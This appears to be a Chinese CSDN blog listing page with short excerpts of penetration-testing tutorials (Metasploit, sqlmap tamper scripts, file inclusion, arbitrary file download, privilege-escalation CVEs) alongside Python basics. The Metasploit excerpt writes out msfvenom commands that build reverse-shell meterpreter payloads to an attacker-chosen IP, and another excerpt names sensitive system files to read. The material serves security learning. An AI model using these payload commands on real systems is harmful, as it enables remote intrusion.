L_lemo004-CSDN博客

原创基础

基础一、常用术语脚本（asp，php，jsp）html（css，js，html）HTTP协议CMS(B/S)MD5信息摘要算法（英语：MD5 Message-Digest Algorithm），一种被广泛使用的密码散列函数，可以产生出一个128位的散列值（hash value），用于确保信息传输完整一致。抓鸡利用使用量大的程序的漏洞，使用自动化方式获取肉鸡的行为。跳板使用肉鸡IP来实施攻击其他目标，以便更好的隐藏自己的身份信息。一句话通

2020-10-20 23:59:44 487

原创 MSF命令大全

0x00 Payload生成Windows/LinuxWindows：msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名WebPHP:msfvenom -p php/meter

2020-10-20 23:59:00 5435

原创命令执行漏洞

命令执行漏洞漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤，用户可以随意执行系统命令，命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致，可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常命令中，从而造成命令执行攻击。PHP执行命令是继承WebServer用

2020-10-20 23:58:12 1319

原创 sqlmap常用绕过脚本

使用方法–tamper xxx.pyapostrophemask.py用UTF-8全角字符替换单引号字符apostrophenullencode.py用非法双字节unicode字符替换单引号字符appendnullbyte.py在payload末尾添加空字符编码base64encode.py对给定的payload全部字符使用Base64编码between.py分别用“NOTBETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”bluec

2020-10-20 23:57:37 1214

原创 MSF常用命令

Msf是kali下的这款强劲的专用工具，开源系统的网络安全问题测试工具前渗入后渗入环节都用获得，只有還是后渗入环节用的多。Msf用途大概就是说exploit进攻，cve进攻，远程控制木马病毒进攻运用。Msfconsole 开启msfMsfconsole -h 协助选择项Banner 用以查询metasploit的版本信息，运用控制模块总数、payload总数控制模块详细介绍：Exploits 渗入进攻控制模块主要用于进攻方式Auxiliary 輔助控制模块主要用于信息内容搜集Payloa

2020-10-20 23:56:41 2518

原创 EXP查询合集提权后渗透必备-------后渗透提权常用漏洞

后渗透提权常用漏洞CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects inmemory] (Windows 7/8/10/2008/2012/2016/2019)CVE-2018-8639 [An elevation of privilege vulnerability exists in

2020-10-20 23:55:59 650

原创代码执行

代码执行当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时，没有考虑用户是否能控制这个字符串，这就会造成代码执行漏洞。成因：应用程序在调用一些能够将字符串转换为代码的函数（例如php中的eval中），没有考虑用户是否控制这个字符串，将造成代码执行漏洞。概念：代码的执行来自于缺乏严格的过滤活着用户控制数据的逃逸。在这里由于攻击者可以控制部分或者所有内容传递给这些未进行严格过滤的函数，从而导致提交的内容会被作为PHP代码执行分类常见敏感函数（代码执行函数）eval()

2020-10-20 23:54:27 392

原创浅析文件上传漏洞

文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞文件上传成因对于上传文件的后缀名（扩展名）没有做较为严格的限制对于上传文件的MIMETYPE 没有做检查权限上没有控制对于上传的文件的文件权限，（尤其是对于shebang类型的文件）对于web server对于上传文件或者指定目录的行为没有做限制客户端校验前段js验证可通过审计修改js代码或burp改包绕过服务器校验content-type字段校验将Content-Type修改为image/gif，或者

2020-10-20 23:50:44 305

原创 Google hack语法

0x00 网上搜集整理的一些可能会用到的Googlehack语法intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类 web 程序,也可用 allintitleinurl: 从 url 中搜索指定的关键字,可专门用来构造各种形式的漏洞 url,也可用 allinurlintext: 从网页中搜索指定的关键字,经常会用它来穿透到漏洞页面……也可用 allintextfiletype: 搜索指定的文件后缀,例如:sql mdb txt bak backup

2020-09-22 23:26:48 2772

原创 PHP伪协议

//文件读取相关函数include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file0x00 PHP伪协议基于函数include()和include_once()两个的利用情况有如下的协议：file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// —

2020-09-22 23:23:52 372

原创文件包含漏洞

文章目录什么是文件包含文件包含漏洞成因PHP文件包含的函数文件包含漏洞分类本地文件包含漏洞总结远程文件包含漏洞PHP内置封装协议常用php://文件包含漏洞之伪协议data:text/plain[ php://input](https://links.jianshu.com/go?to=php%3A%2F%2Finput)[ php://filter](https://links.jianshu.com/go?to=php%3A%2F%2F

2020-09-22 23:22:25 436

原创 DDOS攻击（分布式拒绝服务）

文章目录DDOS攻击（分布式拒绝服务）原理：攻击者想办法让目标服务器的磁盘空间、内存、进程、网络带宽等资源被占满，从而导致正常用户无法访问。危害类型防御附：IP Spoof: 即IP地址欺骗，是一台主机设备冒充另外一台主机的IP地址，与其它设备通信，从而达到某种目的技术。属于IP Spoof类的攻击还有TCP 半连接攻击，也就是SYN Flood攻击DDOS攻击（分布式拒绝服务）原理：攻击者想办法让目标服务器的磁盘空间、内存、进程、网络带宽等资源被占满，从而导致正常用户无法访问。攻击者进行拒绝服务攻击

2020-09-22 23:20:03 1707

原创浅谈暴力破解及验证码安全

文章目录一、暴力破解及验证码安全注意事项二、C/S架构暴力猜解三、B/S架构暴力猜解四、Hydra安装及使用安装参数说明各种用法实例五、防范暴力猜解六、验证码安全工作原理存在的问题图片验证码的生成可能存在如下问题在验证码的程序实现流程方面可能存在如下问题对抗现状验证码未来可能的主要形式操作验证码安全0x01 验证码可重用0x02 验证码可识别0x03 客户端生成/显示/校验0x04 空验证码绕过0x05 验证码数量有限0x06 是否校验可控0x07 超过次数才开启验证码0x08 验证码可预测身份验证码安全0

2020-09-22 23:19:05 2831 2

原创目录遍历漏洞

文章目录目录遍历概念漏洞成因漏洞利用二、目录遍历漏洞第二种情况应用程序操作文件，限制不严时导致访问Web目录以外的文件，包括读写文件和远程执行代码特征测试方法绕过字符过滤利用DVWA进行漏洞测试利用远程文件包含漏洞代码执行权限配置不当引起的本地文件包含漏洞防御措施目录遍历概念目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞，使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制，访问任意的文件（可以是web根目录以外的文件），甚至执行系统命令。

2020-09-22 23:17:30 1573

原创任意文件下载漏洞

文章目录任意文件下载0x01 漏洞介绍0x02 漏洞产生原因0x03 漏洞发现Google search一般链接形式包含参数利用方法WEB-INF0x04 漏洞绕过0x05 漏洞利用常见利用文件路径WindowsLinux0x06 漏洞判断0x07 漏洞验证0x08 漏洞防护通用文件下载漏洞修复0x09 文件路径汇总任意文件读取漏洞漏洞产生原因任意文件读取文件读取函数漏洞验证任意文件读取验证任意文件下载0x01 漏洞介绍一些网站由于业务需求，往往需要提供文件查看或文件下载功能，但若对用户

2020-09-22 23:12:56 4069

原创任意文件下载/读取漏洞

文章目录任意文件下载/读取可下载文件WindowsLinuxSSHNginx任意文件读取的利用思路进一步推断系统版本无痕反弹shell常用默认路径整理sshNginxApachejettyresintomcatsvn一些网站由于业务需求，往往需要提供文件查看或文件下载功能，但若对用户查看或下载的文件不做限制，则恶意用户就能够查看或下载任意敏感文件利用条件危害利用思路目的漏洞验证修复方案任意文件下载/读取可下载文件WindowsC:\boot.ini //查看系统版本C:\Windows\Syst

2020-09-22 23:08:53 2374

原创 Python模块和包

变量与常量变量的概念计算机工作的过程直白讲就是对数据的增、删、改、查操作，那么数据一定是变化的，我们要存储变化的数据就应该用“变量”。什么是变量• 变量即变化的量，核心是“变”与“量”二字，变即变化，量即衡量状态。为什么要有变量• 程序执行的本质就是一系列状态的变化，变是程序执行的直接体现，所以我们需要有一种机制能够反映或者说是保存下来程序执行时的状态以及状态的变化。 #比如：英雄的等级为1，打怪升级(变)为10 ；僵尸的存活状态True，被植物打死了，于是变为False ；人的名字为Alb

2020-09-20 00:48:00 405 1

原创 Python 异常处理

Python 异常处理python提供了两个非常重要的功能来处理python程序在运行中出现的异常和错误。你可以使用该功能来调试python程序。异常处理断言(Assertions)Python异常机制使用细则，正确使用Python异常处理机制前面介绍了使用异常处理的优势、便捷之处，本节将进一步从程序性能优化、结构优化的角度给出异常处理的一般规则。成功的异常处理应该实现如下 4 个目标：使程序代码混乱最小化。捕获并保留诊断信息。通知合适的人员。采用合适的方式结束异常活动。下面介

2020-09-19 00:00:23 829

原创 Python字符串常用方法详解

Python字符串常用方法详解在了解字符串的基本使用之后，本章将介绍 Python 字符串类型常用的几个方法。在 Python 开发过程中，经常需要对字符串进行一些特殊处理，比如拼接字符串、截取字符串、格式化字符串等，这些操作无需开发者自己设计实现，只需调用相应的字符串方法即可。注意，本章所讲的字符串方法，和内置函数（如 len() ）不同，它们是字符串类型（str）所特有的，因此这些字符串方法的调用方式也比较特殊。Python字符串拼接（包含字符串拼接数字）在 Python 中拼接（连接）字符串

2020-09-18 23:59:37 639

原创字符串

python 字符串格式化符号符号描述%c格式化字符及其ASCII码%s格式化字符串%d格式化整数%u格式化无符号整型%o格式化无符号八进制数%x格式化无符号十六进制数%X格式化无符号十六进制数（大写）%f格式化浮点数字，可指定小数点后的精度%e用科学计数法格式化浮点数%E作用同%e，用科学计数法格式化浮点数%g%f和%e的简写%G%f 和 %E 的简写%p用十六

2020-09-18 23:59:10 446

原创 Python字典

字典字典类似于通过联系人名字查找联系人电话号码的电话本，即把键（名字）和值（电话号码）联系在一起。注意，键必须是唯一的。并且python只能使用不可变的对象（比如字符串）来作为字典的键，但是可以将不可变或可变的对象作为字典的值。举一个简单的字典例子。alien = {'color': 'green', 'points': 5}键值对在字典中的标记为：d = {key1 : value1, key2 : value2 }。注意键/值对用冒号分割，而各个对用逗号分割，所有这些都包括在花括号中。字典中的键

2020-09-18 23:58:19 181

原创 Python位运算符优先级

Python 运算符优先级所谓优先级，就是当多个运算符同时出现在一个表达式中时，先执行哪个运算符。例如对于表达式a + b * c，Python 会先计算乘法再计算加法；b * c的结果为 8，a + 8的结果为 24，所以 d 最终的值也是 24。先计算*再计算+，说明*的优先级高于+。Python 支持几十种运算符，被划分成将近二十个优先级，有的运算符优先级不同，有的运算符优先级相同，请看下表。运算符说明Python运算符优先级结合性优先级顺序小括号( )19无

2020-09-18 23:57:43 2227

原创 Python元组

文章目录Python创建元组1) 使用 ( ) 直接创建2) 使用tuple()函数创建元组Python访问元组元素Python修改元组Python删除元组Python元组和列表的区别元组（tuple）是 Python 中另一个重要的序列结构，和列表类似，元组也是由一系列按特定顺序排序的元素组成。元组和列表（list）的不同之处在于：列表的元素是可以更改的，包括修改元素值，删除和插入元素，所以列表是可变序列；而元组一旦被创建，它的元素就不可更改了，所以元组是不可变序列。元组也可以看做是不可变的

2020-09-18 23:57:12 528

原创 Python序列

文章目录0x00 前言0x01序列索引0x02 序列切片0x03 序列相加0x04 序列相乘检查元素是否包含在序列中长度、最大值和最小值序列封包和序列解包和序列相关的内置函数0x00 前言所谓序列，指的是一块可存放多个值的连续内存空间，这些值按一定顺序排列，可通过每个值所在位置的编号（称为索引）访问它们。为了更形象的认识序列，可以将它看做是一家旅店，那么店中的每个房间就如同序列存储数据的一个个内存空间，每个房间所特有的房间号就相当于索引值。也就是说，通过房间号（索引）我们可以找到这家旅店（序列）

2020-09-18 23:56:32 367

原创爬虫入门

文章目录了解网页认识网页结构HTMLCSSJScript写一个简单的 HTML关于爬虫的合法性使用 requests 库请求网站安装 requests 库爬虫的基本原理使用 GET 方式抓取数据使用 POST 方式抓取数据使用 Beautiful Soup 解析网页清洗和组织数据爬虫攻防战扩展阅读这是一篇详细介绍 Python 爬虫入门的教程，从实战出发，适合初学者。读者只需在阅读过程紧跟文章思路，理清相应的实现代码，30 分钟即可学会编写简单的 Python 爬虫。这篇 Python 爬虫教程主要讲解

2020-09-17 00:57:49 265

原创 Python---------------流程控制

和其它编程语言一样，按照执行流程划分，Python 程序也可分为 3 大结构，即顺序结构、选择（分支）结构和循环结构：Python 顺序结构就是让程序按照从头到尾的顺序依次执行每一条 Python 代码，不重复执行任何代码，也不跳过任何代码。Python 选择结构也称分支结构，就是让程序“拐弯”，有选择性的执行代码；换句话说，可以跳过没用的代码，只执行有用的代码。Python 循环结构就是让程序“杀个回马枪”，不断地重复执行同一段代码。顺序结构很好理解，无需多说，本章重点讲解选择结构和循环结构。

2020-09-17 00:55:58 559

原创 Python列表方法

目录添加元素Python append()方法添加元素Python extend()方法添加元素Python insert()方法插入元素删除元素del：根据索引值删除元素pop()：根据索引值删除元素remove()：根据元素值进行删除clear()：删除列表所有元素修改元素修改单个元素修改一组元素查找元素index() 方法count()方法添加元素实际开发中，经常需要对 Python 列表进行更新，包括向列表中添加元素、修改表中元素以及删除元素。本节先来学习如何向列表中添加元素。使用+运算符可以

2020-09-17 00:47:29 437

原创 Python列表

目录列表访问元素修改或添加元素**操作列表****遍历列表**缩进数值列表使用列表的一部分——切片元组**Python创建列表**1) 使用 [ ] 直接创建列表2) 使用 list() 函数创建列表**访问列表元素****Python删除列表**列表列表是是处理一组有序项目的数据结构，即可以在一个列表中存储一个序列的项目。列表中的元素包括在方括号（[]）中，每个元素之间用逗号分割。列表是可变的数据类型，可以添加、删除或是搜索列表中的元素。访问元素访问列表元素可以通过索引+方括号的形式，记住，索引从

2020-09-17 00:42:39 254

原创利用面向对象实现搜索引擎

要想实现一个搜索引擎，首先要了解什么是搜索引擎。简单地理解，搜索引擎是一个系统，它可以帮助用户去互联网上搜集与其检索内容相关的信息。通常，一个搜索引擎由搜索器、索引器、检索器以及用户接口组成，其中各个部分的含义如下：搜索器：其实就是我们常说的爬虫、它能够从互联网中搜集大量的信息，并将之传递给索引器；索引器：理解搜索器搜索到的信息，并从中抽取出索引项，存储到内部的数据库中，等待检索；检索器：根据用户查询的内容，在已经建立好的索引库中快速检索出与之相关的信息，并做相关度评价，以此进行排序。用户接口：

2020-09-17 00:36:02 413

原创 Python集合

Python 中的集合，和数学中的集合概念一样，用来保存不重复的元素，即集合中的元素都是唯一的，互不相同。从形式上看，和字典类似，Python 集合会将所有元素放在一对大括号 {} 中，相邻元素之间用“,”分隔，如下所示：{element1,element2,...,elementn}其中，elementn 表示集合中的元素，个数没有限制。从内容上看，同一集合中，只能存储不可变的数据类型，包括整形、浮点型、字符串、元组，无法存储列表、字典、集合这些可变的数据类型，否则 Python 解释器会抛出

2020-09-17 00:31:00 382

原创 Python基础

变量变量的命名规则：不能以数字开头，只能以字母或下划线开头变量名要简短且具有描述性变量名中不能包含空格，可以用下划线分隔不可使用Python关键字和函数作为变量名慎用小写字母l和大写字母O，容易被看错变量名小写，常量大写赋值name = lzx变量名 = 值字符串是由数字、字母、下划线组成的一串字符。PS：字符串是不可变的，一旦创造了一个字符串，就不能再改变它。background【单引号（’）】和【双引号（"）】两者使用都是相同的，即’hello’

2020-09-17 00:30:15 200

原创 Python函数（函数定义、函数调用）用法详解

函数函数就是一段封装好的，可以重复使用的代码，它使得我们的程序更加模块化，不需要编写大量重复的代码。函数可以提前保存起来，并给它起一个独一无二的名字，只要知道它的名字就能使用这段代码。函数还可以接收数据，并根据数据的不同做出不同的操作，最后再把处理结果反馈给我们。本章不仅会介绍 Python 定义和使用函数的基本语法，还有很多高级的函数用法（例如 lambda 匿名函数），都会为你一一详解。Python函数（函数定义、函数调用）用法详解Python 中函数的应用非常广泛，前面章节中我们已经接触过多

2020-09-17 00:27:07 3859

空空如也

空空如也